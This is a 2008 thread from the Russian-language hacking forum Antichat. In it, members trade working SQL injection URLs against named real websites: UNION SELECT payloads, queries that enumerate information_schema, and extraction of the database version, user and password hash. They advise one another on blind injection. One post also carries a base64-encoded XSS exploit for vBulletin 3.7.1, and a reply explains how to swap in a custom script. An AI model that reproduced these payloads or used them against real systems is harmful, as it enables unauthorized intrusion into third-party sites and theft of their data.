ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.08.2008, 08:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
что тут можно зделать ?
http://interfilm.ru/takelogin.php?returnto=&username=admin&password=99 99999+union+select+1
и вот тут
http://www.photodom.com/ru/catalog.php?page=0&id=9999999)+union+select+1,2,3, 4,5,6,7,9,10/*
а также здесь знаю что юнион использовать нельзя.. но все же..
http://www.aldebaran.ru/gb/index.php?entry=25+union+all+select+1/*
netframework - хз как разкрутить..
http://zman.com/news/category.aspx?CategoryId=20'
SVAROG
http://www.paintball.ru/next.php?id=99999+union+select+1,2,table_name+from +information_schema.tables+limit+17,1--
баян.. |
|
|
11.08.2008, 10:36
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(concat(version(),database (),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
|
|
|
|
11.08.2008, 10:58
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 sabe
http://interfilm.ru/takelogin.php
Пишет что нет коннекта с базой, что ты хочешь от него
Сдесь пятая ветка без вывода,подзапросы:
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1 ,1)=5/*
Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
http://www.aldebaran.ru/gb/index.php?entry=25,1/*
тоесть никак
это ошибка введённых данных использовать можно только расскрытие пути
http://zman.com/news/category.aspx?CategoryId=20
|
|
|
|
11.08.2008, 12:08
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от superboys
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(concat(version(),database (),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
|
|
|
|
11.08.2008, 12:34
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
сёравно @localhost
|
|
|
|
11.08.2008, 15:07
|
|
Новичок
Регистрация: 08.07.2008
Сообщений: 5
Провел на форуме:
42166
Репутация:
0
|
|
vbulletin 3.7.1
XSS-base64
_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html
Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
Помогите разобраться как использовать данную XSS заранее спс.
Последний раз редактировалось TehRn; 11.08.2008 в 15:13..
|
|
|
|
11.08.2008, 20:52
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>"  собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай |
|
|
|
11.08.2008, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?
http://test.livani.lv/lat/aktualitates/aktualitates/?doc=55555551661+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14/*
Последний раз редактировалось mr.The; 11.08.2008 в 21:04..
|
|
|
|
11.08.2008, 21:07
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция |
|
|
|
11.08.2008, 21:24
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
2MaSTeR GэN
и на том спасибо. а я думал туплю где-т
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
